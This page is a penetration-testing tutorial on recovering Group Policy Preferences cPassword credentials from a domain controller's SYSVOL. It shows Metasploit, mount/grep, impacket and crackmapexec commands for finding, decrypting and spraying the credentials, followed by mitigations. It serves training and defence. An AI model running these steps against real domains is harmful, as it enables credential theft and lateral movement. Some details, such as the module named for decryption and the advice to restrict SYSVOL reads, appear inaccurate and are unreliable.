GPP cPassword Attacks

GPP cPassword Attacks#

  • Group Policy Preferences (GPP) allowed administrators to create policies with embedded credentials for tasks like service account management.

  • These credentials were encrypted and stored in a “cPassword” field within Group Policy XML files.

  • Microsoft’s encryption key was accidentally released publicly, allowing anyone to decrypt the cPassword values.

  • Patched in MS14-025 (KB2962486), but the patch only prevents creation of new encrypted credentials—it does not remove or decrypt existing vulnerable files.

  • This makes GPP cPassword attacks highly relevant on penetration tests, as legacy deployments often retain old GPP files in SYSVOL.

Walkthrough#

  1. Enumerate GPP Files from SYSVOL

Use Metasploit’s smb_enum_gpp module to access the SYSVOL of the domain controller and extract Group Policy Preference files:

msfconsole
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS <domain_controller_ip>
set SMBUser <domain_user>
set SMBPass <domain_password>
set SMBDomain <domain_name>
run

Alternatively, you can manually mount SYSVOL and search for XML files containing cPassword:

mount -t cifs //<domain_controller>\SYSVOL /mnt/sysvol -o username=<user>,password=<pass>
grep -r "cPassword" /mnt/sysvol

  1. Decrypt cPassword Values

Once you identify files with cPassword entries, use tools to decrypt them. Common approaches include:

  • Using Metasploit decrypt module:

    use post/windows/gather/credentials/credential_collector

  • Using impacket-Get-GPPPassword or similar custom tools that implement the known decryption algorithm.

  • Using CyberChef or gpp-decrypt online tools (not recommended for sensitive environments).

  1. Validate and Use Credentials

Test the decrypted credentials on domain systems:

crackmapexec smb <target_range> -u <username> -p <decrypted_password> -d <domain>

Apply lateral movement techniques with the recovered credentials.

Mitigations#

  • Apply MS14-025 (KB2962486): Patch all systems to prevent creation of new encrypted credentials in Group Policy Preferences. However, this is not sufficient alone.

  • Delete Legacy GPP XML Files: Manually remove or audit old GPP XML files stored in \\<domain>\SYSVOL\<domain>\Policies\ that may contain cPassword entries. Use:

    # List all GPP files
ls /mnt/sysvol/Policies/*/User/ | grep ".*\.xml"

# Audit and remove vulnerable Group Policy Objects

  • Restrict SYSVOL Access: Limit read access to SYSVOL to only authorized administrators.

  • Monitor for GPP Enumeration: Alert on unusual SMB connections to domain controllers and SYSVOL access attempts.

  • Use Group Policy Managed Service Accounts (gMSA): Replace embedded credentials with gMSA for service accounts, which have auto-rotating passwords managed by the domain.